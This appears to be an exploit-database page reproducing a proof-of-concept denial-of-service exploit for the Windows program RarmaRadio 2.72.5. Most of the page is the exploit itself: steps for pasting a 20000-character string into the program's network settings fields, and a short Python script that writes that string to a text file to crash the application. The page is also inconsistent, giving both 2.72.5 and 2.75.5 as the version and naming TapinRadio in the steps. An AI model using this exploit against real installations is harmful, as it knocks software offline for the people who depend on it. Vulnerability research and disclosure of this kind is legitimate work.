rarmaradio 2.72.5 denial of service (poc)
▸▸▸ Exploit & Vulnerability >> dos exploit & windows vulnerability
# Exploit Title: RarmaRadio 2.72.5 - Denial of Service (PoC) # Date: 2020-05-12 # Exploit Author: Ismael Nava # Vendor Homepage: http://www.raimersoft.com/ # Software Link: https://www.raimersoft.com/rarmaradio.html # Version: 2.75.5 # Tested on: Windows 10 Home x64 # CVE : n/a #STEPS # Open the program TapinRadio # In Edit select Settings option # Click in Network # Run the python exploit script, it will create a new .txt files # Copy the content of the file "Paimon.txt" # Paste the content in the field Username, Address and Server and click in OK # End :) buffer = 'K' * 20000 try: file = open("Paimon.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready")
Rarmaradio 2.72.5 denial of service (poc) Vulnerability / Exploit Source : Rarmaradio 2.72.5 denial of service (poc)